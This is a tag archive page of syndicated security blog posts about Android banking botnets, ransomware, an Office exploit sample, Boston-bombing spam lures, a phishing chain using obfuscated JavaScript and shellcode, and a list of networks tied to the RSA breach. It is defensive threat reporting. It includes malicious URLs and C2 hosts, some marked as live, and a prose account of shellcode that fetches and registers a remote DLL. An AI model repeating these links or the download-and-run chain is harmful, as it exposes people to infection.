Posts tagged ‘trend micro’

Krebs on Security: Android Botnet Targets Middle East Banks

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

I recently encountered a botnet targeting Android smartphone users who bank at financial institutions in the Middle East. The crude yet remarkably effective mobile bot that powers this whole operation comes disguised as one of several online banking apps, has infected more than 2,700 phones, and has intercepted at least 28,000 text messages.

The botnet — which I’ve affectionately dubbed “Sandroid” — comes bundled with Android apps made to look like mobile two-factor authentication modules for various banks, including Riyad Bank, SAAB (formerly the Saudi British Bank), AlAhliOnline (National Commercial Bank), Al Rajhi Bank, and Arab National Bank.

The fake Android bank apps employed by this botnet.

The fake Android bank apps employed by the Sandroid botnet.

It’s not clear how the apps are initially presented to victims, but if previous such scams are any indication they are likely offered after infecting the victim’s computer with a password-stealing banking Trojan. Many banks send customers text messages containing one-time codes that are used to supplement a username and password when the customer logs on to the bank’s Web site. And that precaution of course requires attackers interested in compromising those accounts to also hack the would-be victim’s phone.

Banking Trojans — particularly those targeting customers of financial institutions outside of the United States — will often throw up a browser pop-up box that mimics the bank and asks the user to download a “security application” on their mobile phones. Those apps are instead phony programs that merely intercept and then relay the victim’s incoming SMS messages to the botnet master, who can then use the code along with the victim’s banking username and password to log in as the victim.

Text messages intercepted by the Sandroid botnet malware.

Some of the 28,000+ text messages intercepted by the Sandroid botnet malware.

This particular botnet appears to have been active for at least the past year, and the mobile malware associated with it has been documented by both Symantec and Trend Micro. The malware itself seems to be heavily detected by most of the antivirus products on the market, but then again it’s likely that few — if any — of these users are running antivirus applications on their mobile devices.

In addition, this fake bank campaign appears to have previously targeted Facebook, as well as banks in Australia and Spain, including Caixa Bank, Commonwealth Bank, National Australia Bank, and St. George Bank.

The miscreant behind this campaign seems to have done little to hide his activities. The same registry information that was used to register the domain associated with this botnet — funnygammi.com — was also used to register the phony bank domains that delivered this malware, including alrajhiankapps.com, commbankaddons.com, facebooksoft.net, caixadirecta.net, commbankapps.com, nationalaustralia.org, and stgeorgeaddons.com. The registrar used in each of those cases was Center of Ukrainian Internet Names.

I am often asked if people should be using mobile antivirus products. From my perspective, most of these malicious apps don’t just install themselves; they require the user to participate in the fraud. Keeping your mobile device free of malware involves following some of the same steps outlined in my Tools for a Safer PC and 3 Rules primers: Chiefly, if you didn’t go looking for it, don’t install it! If you own an Android device and wish to install an application, do your homework before installing the program. That means spending a few moments to research the app in question, and not installing apps that are of dubious provenance. 

That said, this malware appears to be well-detected by mobile antivirus solutions. Many antivirus firms offer free mobile versions of their products. Some are free, and others are free for the initial use — they will scan and remove malware for free but charge for yearly subscriptions. Some of the free offerings include AVG, Avast, Avira, Bitdefender, Dr. Web, ESET, Fortinet, Lookout, Norton, Panda Cloud Antivirus, Sophos, and ZoneAlarm.

Incidentally, the mobile phone number used to intercept all of the text messages is +79154369077, which traces back to a subscriber in Moscow on the Mobile Telesystems network.

Schneier on Security: PowerLocker uses Blowfish

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

There’s a new piece of ransomware out there, PowerLocker (also called PrisonLocker), that uses Blowfish:

PowerLocker could prove an even more potent threat because it would be sold in underground forums as a DIY malware kit to anyone who can afford the $100 for a license, Friday’s post warned. CryptoLocker, by contrast, was custom built for use by a single crime gang. What’s more, PowerLocker might also offer several advanced features, including the ability to disable the task manager, registry editor, and other administration functions built into the Windows operating system. Screen shots and online discussions also indicate the newer malware may contain protections that prevent it from being reverse engineered when run on virtual machines.

PowerLocker encrypts files using keys based on the Blowfish algorithm. Each key is then encrypted to a file that can only be unlocked by a 2048-bit private RSA key. The Malware Must Die researchers said they had been monitoring the discussions for the past few months. The possibility of a new crypto-based ransomware threat comes as developers continue to make improvements to the older CryptoLocker title. Late last month, for instance, researchers at antivirus provider Trend Micro said newer versions gave the CryptoLocker self-replicating abilities that allowed it to spread through USB thumb drives.

Krebs on Security: A Closer Look: Perkele Android Malware Kit

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

In March 2013 I wrote about Perkele, a crimeware kit designed to create malware for Android phones that can help defeat multi-factor authentication used by many banks. In this post, we’ll take a closer look at this threat, examining the malware as it is presented to the would-be victim as well as several back-end networks set up by cybercrooks who have been using mobile bots to fleece banks and their customers.

Perkele disguises itself as an various Android security applications and certiifcates.

Perkele disguises itself as various Android security applications and certificates.

Perkele is sold for $1,000, and it’s made to interact with a wide variety of malware already resident on a victim’s PC. When a victim visits his bank’s Web site, the Trojan (be it Zeus or Citadel or whatever) injects malicious code into the victim’s browser, prompting the user to enter his mobile information, including phone number and OS type.

That information is relayed back to the attacker’s control server, which injects more code into the victim’s browser prompting him to scan a QR code with his mobile device to install an additional security mechanism.

Once the victim scans the QR code, the Perkele malware is downloaded and installed, allowing the attackers to intercept incoming SMS messages sent to that phone. At that point, the malware on the victim’s PC automatically initiates a financial transaction from the victim’s account.

When the bank sends an SMS with a one-time code, Perkele intercepts that code and sends it to the attacker’s control server. Then the malicious script on the victim’s PC receives the code and completes the unauthorized transaction.

Web site security firm Versafe located a server that was being used to host malicious scripts tied to at least one Perkele operation. The company produced this report (PDF), which delves a bit deeper into the behavior and network activity generated by the crimeware kit.

Versafe’s report includes several screenshots of the Perkele application as offered to would-be victims. The malware is presented as a security certificate; it’s named “zertificate” because the victim in this case banked at a German financial institution.

Perkele disguised as a security certificate for a German bank. Source: Versafe.

Perkele disguised as a security certificate for a German bank. Source: Versafe.

A few weeks ago, I encountered the back end system for what appears to be a Perkele distribution, or perhaps some other mobile malware bot; I should note that disguising an Android banking Trojan as a security certificate is not a ruse that’s limited to Perkele: The Pincert SMS malware also employs this trick, according to F-Secure.

Anyhow, I scarcely had time to examine this particular mobile bot control panel before it was either taken down by German authorities or was moved elsewhere by the fraudsters. But it, too, was intercepting one-time codes from German banking victims using an Android malware component similarly disguised as a “zertificate.”

This Android SMS bot control panel targeted German bank customers.

This Android SMS bot control panel targeted German bank customers.

Apparently, it was fairly successful, stealing one-time codes from online banking customers of several German financial institutions, including Postbank and Comdirect.

Dozens of German banking customers were victimized by this Android bot control panel.

Dozens of German banking customers were victimized by this Android bot control panel.

In the screen grab below, we can see the main administrative page of this panel, which controls which banks should be targeted and from where the fraudulent text messages should be sent.

mobilemalware5

There seems to be a great deal of interest in the cybercrime underground for developing or procuring tools to trojanize Android devices. According to a recent report from security firm Trend Micro, the number of malicious and high-risk Android apps steadily increased in the first six months of 2013. According to Trend, the number of malicious and high-risk apps took three years to reach 350,000, a number that has already doubled in just the first half of 2013.

Source: Trend Micro

Android malware growth in the first six months of 2013. Source: Trend Micro

Fortunately, a modicum of common sense and impulse control can keep most Android users out of trouble. Take a moment to read and comprehend an app’s permissions before you install it. Also, consider downloading and installing apps only from Google’s Play store, which scans all apps for malware. Also there are numerous free and paid anti-malware applications available for Android.

SANS Internet Storm Center, InfoCON: green: Exploit Sample for Win32/CVE-2012-0158, (Sat, Jun 1st)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Two weeks ago I posted a diary on a report published by Trend Micro on a spear-phishing emails campaign using malicious Word documents exploiting a Microsoft Office vulnerability (CVE-2012-0158).

We received a sample of a Word document exploiting CVE-2012-0158 which I took a look at. The file itself is pretty small (325Kb) and based on VirusTotal's MD5 hash report, 30/47 scan engines detected and confirmed it exploits CVE-2012-0158. I used the malwr sandbox to get a better look on how this Word document behaves while running on a Windows system. The one thing I noticed is Yara was positive to check if the file is running in a virtual machine.

[1] https://isc.sans.edu/diary/Safe+-++Tools%2C+Tactics+and+Techniques/15848
[2] https://www.virustotal.com/en/file/2cf2fbe92004b98b8dd5ff4631787dcf8241723020f1216b89a1a706addf9347/analysis/
[3] http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2005-031911-0600-99&vid=17499
[4] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158
[5] https://malwr.com/analysis/NmI3NjQ1MmI5ODhkNDliMmEwYTlmNjRkYTA0MzZkMzU/
[6] http://code.google.com/p/yara-project/

———–

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: UPDATEDx1: Boston-Related Malware Campaigns Have Begun – Now with Waco Plant Explosion Fun, (Wed, Apr 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

UPDATE: 04-18-2013 @ 10:10 AM CDT -

Some of the spam campaigns are now changing over to the Waco plant explosion. Basically the lure is the same, a subject that talks mentions the video and then an IP only url with /texas.html or /news.html.  The landing page has a few embedded YouTube videos and an iframe with malicious content at the end.

** End Update 1 **

About mid-afternoon yesterday (Central time – US), Boston related spam campaigns have begun. The general "hook" is that it sends a URL with a subject about the video from the explosions. Similar to when Osama Bin Laden was killed and fake images were used as a hook, in this case, the video is relevant to the story and being used as a hook.  Right now, very roughly 10-20% of all spam is related to this (some spamtraps reporting more, some less).  Similar IPs have also been sending pump & dump scams so likely the same group has re-tasted itself.

Here is a list of subjects I've seen hit spam traps:

Subject: 2 Explosions at Boston Marathon
Subject: Aftermath to explosion at Boston Marathon
Subject: Arbitron. Dial Global. Boston Bombings
Subject: Boston Explosion Caught on Video
Subject: BREAKING – Boston Marathon Explosion
Subject: Explosion at Boston Marathon
Subject: Explosion at the Boston Marathon
Subject: Explosions at Boston Marathon
Subject: Explosions at the Boston Marathon
Subject: Opinion: Boston Marathon Explosions made by radical Gays? Really? – CNN.com
Subject: Opinion: Boston Marathon Explosions – Romney Benefits? – CNN.com
Subject: Opinion: Boston Marathon Worse Sensation – Osama bin Laden still alive!? – CNN.com
Subject: Opinion: FBI knew about bombs 3 days before Boston Marathon – Why and Who Benefits? – CNN.com
Subject: Opinion: Osama Bin Laden video about Boston Marathon Explosions – bad news for all the world. – CNN.com
Subject:[SPAM] 2 Explosions at Boston Marathon
Subject:[SPAM] Boston Explosion Caught on Video
Subject:[SPAM] Explosions at the Boston Marathon
Subject:[SPAM] Video of Explosion at the Boston Marathon 2013
Subject: Stiri:EXPLOZIILE de la maratonul din Boston/Spaga este negociata la granita Romaniei/A inventat bautura care INLOCUIESTE MANCAREA/TUNELUL cu mecanisme de NEINTELES al lui STALIN/70 % din infrastructura RCS-RDS este amplasata ILEGAL/BOMBA ANULUI IN SHOWBIZ
Subject: Video of Explosion at the Boston Marathon 2013

Here is a list of malicious URLs in those messages (use at your own risk):

hxxp://109.87.205.222/boston.html
hxxp://109.87.205.222/news.html
hxxp://110.92.80.47/boston.html
hxxp://110.92.80.47/news.html
hxxp://118.141.37.122/boston.html
hxxp://118.141.37.122/news.html
hxxp://176.241.148.169/boston.html
hxxp://176.241.148.169/news.html
hxxp://178.137.100.12/boston.html
hxxp://178.137.100.12/news.html
hxxp://178.137.120.224/boston.html
hxxp://178.137.120.224/news.html
hxxp://188.2.164.112/boston.html
hxxp://188.2.164.112/news.html
hxxp://190.245.177.248/boston.html
hxxp://190.245.177.248/news.html
hxxp://212.75.18.190/boston.html
hxxp://212.75.18.190/news.html
hxxp://213.34.205.27/boston.html
hxxp://213.34.205.27/news.html
hxxp://217.145.222.14/boston.html
hxxp://217.145.222.14/news.html
hxxp://219.198.196.116/boston.html
hxxp://219.198.196.116/news.html
hxxp://24.180.60.184/boston.html
hxxp://24.180.60.184/news.html
hxxp://24.214.242.227/boston.html
hxxp://24.214.242.227/news.html
hxxp://31.133.84.65/boston.html
hxxp://31.133.84.65/news.html
hxxp://37.229.215.183/boston.html
hxxp://37.229.215.183/news.html
hxxp://37.229.92.116/boston.html
hxxp://37.229.92.116/news.html
hxxp://46.233.4.113/boston.html
hxxp://46.233.4.113/news.html
hxxp://46.233.4.113/xxxxx.html
hxxp://50.136.163.28/boston.html
hxxp://50.136.163.28/news.html
hxxp://61.63.123.44/boston.html
hxxp://61.63.123.44/news.html
hxxp://62.45.148.76/boston.html
hxxp://62.45.148.76/news.html
hxxp://62.45.148.76/xxxxx.html
hxxp://78.90.133.133/boston.html
hxxp://78.90.133.133/news.html
hxxp://83.170.192.154/boston.html
hxxp://83.170.192.154/news.html
hxxp://85.198.81.26/boston.html
hxxp://85.198.81.26/news.html
hxxp://85.204.15.40/boston.html
hxxp://85.204.15.40/news.html
hxxp://85.217.234.98/boston.html
hxxp://85.217.234.98/news.html
hxxp://91.241.177.162/boston.html
hxxp://91.241.177.162/news.html
hxxp://91.241.177.162/xxxxx.html
hxxp://94.153.15.249/boston.html
hxxp://94.153.15.249/news.html
hxxp://94.28.49.130/boston.html
hxxp://94.28.49.130/news.html
hxxp://95.69.141.121/boston.html
hxxp://95.69.141.121/news.html
hxxp://95.87.6.156/boston.html
hxxp://95.87.6.156/news.html
 
Some of these are already down, but basically plain pages with a handful of embedded YouTube videos that are relevant.  Early versions would redirect to fetch a file: boston___________AVI.exe and on down the rabbit hole it goes.  It was pretty loud so most AV should have sigs already.
 
H/T to Nick Tabick and Corbin Souffrant, two of my students at the University of Illinois who helped dig into this last night.
 


John Bambenek
bambenek \at\ gmail /dot/ com
Bambenek Consulting

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: Phishing with obfuscated javascript, shellcode and malware, (Fri, Mar 2nd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Be careful with the links showed in this diary because they are live and could infect your computer if not handled properly

Phishing e-mail artwork is becoming more effective everyday. Users are having a bad time trying to distinguish the fake sites from the real ones. I am going to show you a different phising e-mail that does not take the user to a website to try to steal a password but installs malware to the computer using obfuscated javascripts and shellcodes.

I received today the following message:

This looked strange. I reviewed the link and pointed me to http://thedizzybaker.com/wp-includes/int-market.html. The following javascript appeared:

This javascript is obfuscated. I used firebug to get more information and got an iframe pointing to other website:

Following the new link, we find another obfuscated javascript. Let’s see a snip of it:

Now here is where the malicious stuff begins. After deobfuscating the script, we find the following:

The script tries to determine which navigator is running the system:

The script tries to determine the Adobe Flash and Adobe Reader version installed:

A shellcode is executed:

Let’s take a look to the shellcode. It executes the following instructions:

kernel32.VirtualProtect: This function is called in the shellcode to establish a 255-byte memory segment where the memory protection attributes can be modified. For more information about the available attributes, see http://msdn.microsoft.com/en-us/library/windows/desktop/aa366786%28v=vs.85%29.aspx.
kernel32. LoadLibraryA: This function is called to load the urlmon.dll library, which is used to transfer information using the http protocol. A couple of functions inside the file are:
urlmon.URLDownloadToFileA: The function is called to download http://migdaliasbistro.net/w.php?f=f7d19e=1 and save it to wpbt0.dll.
kernel32.WinExec:This function is called to register the dll using regsvr32 -s and then executed.
kernel32.TerminateThread: This function is called to end the execution of the shellcode.

The file download in step 3 is a dll with MD5c3124a2981d8e1b9e13e8c21c96448f7. Virustotal shows a 7/43 detection ratio.It injects into explorer.exe and performs inline hooking to ntdll.dll. Once it is installed, it reports to hbirjhcnsuiwgtrq.ru, which resolvs to the following ip addresses: 94.20.30.91, 98.103.133.13, 173.203.211.157, 211.44.250.173, 46.137.85.218, 83.170.91.152, 87.120.41.155 using a http POST to the /rwx/B2_9w3/in/ location.

Such threats are increasing and control of these involves the establishment of malware control measures as part of te Information Security Architecture of the company, like the following:

Antimalware perimeter defense: I recommend using the Trend Micro and Mcafee web gateways. They are scalabe and integrates very good with the antimalware monitoring system inside the corporation. This measure allows to protect users from downloading malicious code like javascript and executables.
Host IPS: The antimalware control is not enough in these days as the threats are evolving and the antivirus companies are not capable anymore to control in real time all the emerging malware attacks. This tool is used to prevent the materialization of the vulnerabilities on computers, such as buffer overflow, code injection, among others. Thus, the computer is protected until the virus signature is out sothe antimalware programis able to deal with the respective threat.
Antimalware: This is the conventional antimalware control that is sold by the antivirus companies.

Manuel Humberto Santander Pelez

SANS Internet Storm Center – Handler

Twitter: @manuelsantander

Web:http://manuel.santander.name

e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: Warnings About Windows Exploit, pcAnywhere

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Security experts have spotted drive-by malware attacks exploiting a critical security hole in Windows that Microsoft recently addressed with a software patch. Separately, Symantec is warning users of its pcAnywhere remote administration tool to either update or remove the program, citing a recent data breach at the security firm that the company said could help attackers find holes in the aging software title.

On Thursday, Trend Micro said it had encountered malware that leverages a vulnerability in the way Windows handles certain media files. This is a browse-and-get-owned flaw for Windows XP, Windows Vista, Windows Server 2003 and 2008 users, meaning these folks can infect their machines merely by browsing to a hacked or malicious site hosting a specially crafted media file. If you run Windows and have delayed installing this month’s updates, consider taking care of that now by visiting Windows Update.

Trend Micro competitor Symantec also issued a warning this week — about threats to its own software. Responding to a now widely-publicized break-in that resulted in the theft of its proprietary source code in 2006, Symantec issued a 10-page white paper with recommendations for customers still using this software. The company says fewer than 50,000 people are still using pcAnywhere, but those who are should consider applying newly-released updates, or removing the program altogether.

From that whitepaper (PDF):

With this incident pcAnywhere customers have increased risk. Malicious users with access to the source code have an increased ability to identify vulnerabilities and build new exploits. Additionally, customers that are not following general security best practices are susceptible to man-in-the-middle attacks which can reveal authentication and session information. General security best practices include endpoint, network, remote access, and physical security, as well as configuring pcAnywhere in a way that minimizes potential risks.

At this time, Symantec recommends disabling the product until Symantec releases a final set of software updates that resolve currently known vulnerability risks. For customers that require pcAnywhere for business critical purposes, it is recommended that customers understand the current risks, ensure pcAnywhere 12.5 is installed, apply all relevant patches as they are released, and follow the general security best practices discussed herein.

On Thursday, Symantec released updates to address at least three security vulnerabilities in pcAnywhere 12.5 for Windows. The company said it plans to issue additional updates for pcAnywhere 12.0, pcAnywhere 12.1 and pcAnywhere 12.5, although it didn’t say precisely when those updates would be available.

It’s generally a bad idea to leave remote administration tools like pcAnywhere always on and always accessible via the Internet. If you must use them, I’d strongly recommend limiting allowable connections to specific computer names or Internet addresses, limiting the number of consecutive logon attempts, and — if feasible– incorporating some type of token based solution.

Krebs on Security: Who Else Was Hit by the RSA Attackers?

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The data breach disclosed in March by security firm RSA received worldwide attention because it highlighted the challenges that organizations face in detecting and blocking intrusions from targeted cyber attacks. The subtext of the story was that if this could happen to one of the largest and most integral security firms, what hope was there for organizations that aren’t focused on security?

Security experts have said that RSA wasn’t the only corporation victimized in the attack, and that dozens of other multinational companies were infiltrated using many of the same tools and Internet infrastructure. But so far, no one has been willing to talk publicly about which other companies may have been hit.  Today’s post features a never-before-published list of those victim organizations. The information suggests that more than 760 other organizations had networks that were compromised with some of the same resources used to hit RSA. Almost 20 percent of the current Fortune 100 companies are on this list.

Since the RSA incident was disclosed, lawmakers in the U.S. Congress have taken a renewed interest in so-called “advanced persistent threat” or APT attacks. Some of the industry’s top security experts have been summoned to Capitol Hill to brief lawmakers and staff about the extent of the damage. The information below was shared with congressional staff.

Below is a list of companies whose networks were shown to have been phoning home to some of the same control infrastructure that was used in the attack on RSA. The first victims appear to have begun communicating with the attacker’s control networks as early as November 2010.

A few caveats are in order here. First, many of the network owners listed are Internet service providers, and are likely included because some of their subscribers were hit. Second, it is not clear how many systems in each of these companies or networks were compromised, for how long those intrusions persisted, or whether the attackers successfully stole sensitive information from all of the victims. Finally, some of these organizations (there are several antivirus firms mentioned  below) may be represented because they  intentionally compromised internal systems in an effort to reverse engineer malware used in these attacks.

Among the more interesting names on the list are Abbott Labs, the Alabama Supercomputer Network, Charles Schwabb & Co., Cisco Systems, eBay, the European Space Agency, Facebook, Freddie Mac, Google, the General Services Administration, the Inter-American Development Bank, IBM, Intel Corp., the Internal Revenue Service (IRS), the Massachusetts Institute of Technology, Motorola Inc., Northrop Grumman, Novell, Perot Systems, PriceWaterhouseCoopers LLP, Research in Motion (RIM) Ltd., Seagate Technology, Thomson Financial, Unisys Corp., USAA, Verisign, VMWare, Wachovia Corp., and Wells Fargo & Co.

At the end of the victim list is a pie chart that shows the geographic distribution of the command and control networks used to coordinate the attacks. The chart indicates that the overwhelming majority of the C&Cs are located in or around Beijing, China.

302-DIRECT-MEDIA-ASN
8e6 Technologies, Inc.
AAPT AAPT Limited
ABBOTT Abbot Labs
ABOVENET-CUSTOMER – Abovenet Communications, Inc
ACCNETWORKS – Advanced Computer Connections
ACEDATACENTERS-AS-1 – Ace Data Centers, Inc.
ACSEAST – ACS Inc.
ACS-INTERNET – Affiliated Computer Services
ACS-INTERNET – Armstrong Cable Services
ADELPHIA-AS – Road Runner HoldCo LLC
Administracion Nacional de Telecomunicaciones
AERO-NET – The Aerospace Corporation
AHP – WYETH-AYERST/AMERICAN HOME PRODUCTS
AIRLOGIC – Digital Magicians, Inc.
AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
AIS-WEST – American Internet Services, LLC.
AKADO-STOLITSA-AS _AKADO-Stolitsa_ JSC
ALCANET Corporate ALCANET Access
ALCANET-DE-AS Alcanet International Deutschland GmbH
ALCATEL-NA – Alcanet International NA
ALCHEMYNET – Alchemy Communications, Inc.
Alestra, S. de R.L. de C.V.
ALLIANCE-GATEWAY-AS-AP Alliance Broadband Services Pvt. Ltd.,Alliance Gateway AS,Broadband Services Provider,Kolkata,India
ALMAZAYA Almazaya gateway L.L.C
AMAZON-AES – Amazon.com, Inc.
AMERITECH-AS – AT&T Services, Inc.
AMNET-AU-AP Amnet IT Services Pty Ltd
ANITEX-AS Anitex Autonomus System
AOL-ATDN – AOL Transit Data Network
API-DIGITAL – API Digital Communications Group, LLC
APOLLO-AS LATTELEKOM-APOLLO
APOLLO-GROUP-INC – University of Phoenix
APT-AP AS
ARLINGTONVA – Arlington County Government

ARMENTEL Armenia Telephone Company
AS INFONET
AS3215 France Telecom – Orange
AS3602-RTI – Rogers Cable Communications Inc.
AS4196 – Wells Fargo & Company
AS702 Verizon Business EMEA – Commercial IP service provider in Europe
ASATTCA AT&T Global Network Services – AP
ASC-NET – Alabama Supercomputer Network
ASDANIS DANIS SRL
ASGARR GARR Italian academic and research network
ASIAINFO-AS-AP ASIA INFONET Co.,Ltd./ TRUE INTERNET Co.,Ltd.
ASIANDEVBANK – Asian Development Bank
ASN852 – Telus Advanced Communications
AS-NLAYER – nLayer Communications, Inc.
ASTOUND-CABLE – Wave Broadband, LLC
AT&T Global Network Services – EMEA
AT&T US
ATMAN ATMAN Autonomous System
ATOMNET ATOM SA
ATOS-AS ATOS Origin Infogerance Autonomous System
ATT-INTERNET4 – AT&T Services, Inc.
AUGERE-AS-AP Augere Wireless Broadband Bangladesh Limited
AVAYA AVAYA
AVENUE-AS Physical person-businessman Kuprienko Victor Victorovich
AXAUTSYS ARAX I.S.P.
BACOM – Bell Canada
BAHNHOF Bahnhof AB
BALTKOM-AS SIA _Baltkom TV SIA_
BANGLALINK-AS an Orascom Telecom Company, providing GSM service in Bangladesh
BANGLALION-WIMAX-BD Silver Tower (16 & 18th Floor)
BANKINFORM-AS Ukraine
BASEFARM-ASN Basefarm AS. Oslo – Norway
BBIL-AP BHARTI Airtel Ltd.
BBN Bredbaand Nord I/S
BC-CLOUD-SERVICES
BEAMTELE-AS-AP Beam Telecom Pvt Ltd
BEE-AS JSC _VimpelCom_
BELINFONET Belinfonet Autonomus System, Minsk, Belarus
BELLSOUTH-NET-BLK – BellSouth.net Inc.
BELPAK-AS BELPAK
BELWUE Landeshochschulnetz Baden-Wuerttemberg (BelWue)
BENCHMARK-ELECTRONICS – Benchmark Electronics Inc.
BEND-BROADBAND – Bend Cable Communications, LLC
BEZEQ-INTERNATIONAL-AS Bezeqint Internet Backbone
BIGNET-AS-ID Elka Prakarsa Utama, PT
BLUEWIN-AS Swisscom (Schweiz) AG
BM-AS-ID PT. Broadband Multimedia, Tbk
BN-AS Business network j.v.
BNSF-AS – Burlington Northern Sante Fe Railway Corp
BNT-NETWORK-ACCESS – Biz Net Technologies
BORNET Boras Energi Nat AB
BREEZE-NETWORK TOV TRK _Briz_
BSC-CORP – Boston Scientific Corporation
BSKYB-BROADBAND-AS BSkyB Broadband
BSNL-NIB National Internet Backbone
BT BT European Backbone
BT-ITALIA BT Italia S.p.A.
BTN-ASN – Beyond The Network America, Inc.
BTTB-AS-AP Telecom Operator & Internet Service Provider as well
BT-UK-AS BTnet UK Regional network
CABLECOM Cablecom GmbH
CABLE-NET-1 – Cablevision Systems Corp.
CABLEONE – CABLE ONE, INC.
CABLEVISION S.A.
CACHEFLOW-AS – Bluecoat Systems, Inc.
CANET-ASN-4 – Bell Aliant Regional Communications, Inc.
CANTV Servicios, Venezuela
CAPEQUILOG – CapEquiLog
CARAVAN CJSC Caravan-Telecom
CARRIER-NET – Carrier Net
CATCHCOM Ventelo
CCCH-3 – Comcast Cable Communications Holdings, Inc
CDAGOVN – Government Telecommunications and Informatics Services
CDS-AS Cifrovye Dispetcherskie Sistemy
CDT-AS CD-Telematika a.s.
CE-BGPAC – Covenant Eyes, Inc.
CELLCO-PART – Cellco Partnership DBA Verizon Wireless
CENSUSBUREAU – U. S. Bureau of the Census
CERNET-ASN-BLOCK – California Education and Research Federation Network
CERT – Computer Emergency Response Team (CERT) – Coordination Center
CGINET-01 – CGI Inc
CHARLES-SCHWAB – Charles Schwab & Co., Inc.
CHARTER-NET-HKY-NC – Charter Communications
CHINA169-BACKBONE CNCGROUP China169 Backbone
CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
CHINA169-GZ China Unicom IP network China169 Guangdong province
CHINANET-BACKBONE No.31,Jin-rong Street
CHINANET-IDC-BJ-AP IDC, China Telecommunications Corporation
CHINANET-SH-AP China Telecom (Group)
CIPHERKEY – Cipherkey Exchange Corp.
CISCO-EU-109 Cisco Systems Global ASN – ARIN Assigned
CITEC-AU-AP QLD Government Business (IT)
CITelecom-AS
CITYNET – CityNet
CLARANET-AS ClaraNET
CLIX-NZ TelstraClear Ltd
CMCS – Comcast Cable Communications, Inc.
CMNET-BEIJING-AP China Mobile Communicaitons Corporation
CMNET-GD Guangdong Mobile Communication Co.Ltd.
CMNET-V4SHANDONG-AS-AP Shandong Mobile Communication Company Limited
CNCGROUP-GZ CNCGROUP IP network of GuangZhou region MAN network
CNCGROUP-SH China Unicom Shanghai network
CNIX-AP China Networks Inter-Exchange
CNNIC-DSNET-AP Shanghai Data Solution Co., Ltd.
CNNIC-WASU-AP WASU TV & Communication Holding Co.,Ltd.
CO-2COM-AS 2COM Co ltd.
COGECOWAVE – Cogeco Cable
COGENT Cogent/PSI
COLO4 – Colo4Dallas LP
COLOMBIA TELECOMUNICACIONES S.A. ESP
COLT COLT Technology Services Group Limited
COLUMBUS-NETWORKS – Columbus Networks USA, Inc.
COMCAST-33490 – Comcast Cable Communications, Inc.
COMCAST-33491 – Comcast Cable Communications, Inc.
COMCAST-36732 – Comcast Cable Communications, Inc.
COMCAST-7015 – Comcast Cable Communications Holdings, Inc
COMCAST-7725 – Comcast Cable Communications Holdings, Inc
COMCAST-HOUSTON – Comcast – Houston
COMHEM-SWEDEN Com Hem Sweden
COMNET-TH KSC Commercial Internet Co. Ltd.
Completel Autonomous System in France
COMSAT COLOMBIA
COMSTAR COMSTAR-Direct global network
CORBINA-AS Corbina Telecom
COVAD – Covad Communications Co.
CPMBLUE-AS-BD CPM BLUE ONLINE LTD.Transit AS Internet Service Provider, Dhaka
CRRSTV – CRRS-TV
CSC Computer Management and CSC Denmark
CSC-IGN-AUNZ-AP Computer Sciences Corporation
CSC-IGN-EMEA – Computer Sciences Corporation
CSC-IGN-FTW – Computer Sciences Corporation
CSLOXINFO-AS-AP CS LOXINFO PUBLIC COMPANY LIMITED
CSP-AS CSP
CSUNET-NW – California State University Network
CSXT-AS-1 – CSX Technology
CTIHK-AS-AP City Telecom (H.K.) Ltd.
CTS-MD I.S. Centrul de Telecomunicatii Speciale
CXA-ALL-CCI-22773-RDC – Cox Communications Inc.
CYBERVERSE – Cyberverse, Inc.
CYPRESS-SEMICONDUCTOR – Cypress Semiconductor
CYTA-NETWORK Cyprus Telecommunications Authority
DARLICS-AS Darlics ltd. provides IP transport and Internet
DATAGRUPA SIA _Datagrupa.lv_ Marijas 7 – 412a Riga, LV-1050, LATVIA
DCI-AS DCI Autonomous System
DECHO – Decho Corporation
DFINET DFi Service SA
DHL-AS DHL Systems Inc.
DHSINETNOC – DEPARTMENT OF HOMELAND SECURITY
DIGCOMM Digital communications, LTD
DIGITAL-TELEPORT – Digital Teleport Inc.
DIL-AP DIRECT INTERNET LTD.
DIN-AS TOMSKTELECOM AS
DINAS-AS PE Kuznetsova Viktoria Viktorovna
DINET-AS Digital Network JSC
Diveo do Brasil Telecomunicacoes Ltda
DK-ESS-AS Syd Energi Bredbaand A/S
DMSLABNET – DoD Network Information Center
DNC-AS IM Data Network Communication SRL
DNEO-OSP7 – Comcast Cable Communications, Inc.
DNIC-ASBLK-00721-00726 – DoD Network Information Center
DNIC-ASBLK-27032-27159 – DoD Network Information Center
DOGAN-ONLINE Dogan Iletisim Elektronik Servis Hizmetleri
DOMAINFACTORY domainfactory GmbH
DOMAINTOOLS – DomainTools, LLC
DONTELE-AS Telenet LLC
DOPC-AS
DOPC-AS-NGN
DOPC-AS-US
DREAMHOST-AS – New Dream Network, LLC
DREAMX-AS DREAMLINE CO.
DRWEB-AS Doctor Web Ltd
DSE-VIC-GOV-AS Department of Sustainability & Environment,
DSIJSC-AS DSI Autonomous system
DSLEXTREME – DSL Extreme
DTAG Deutsche Telekom AG
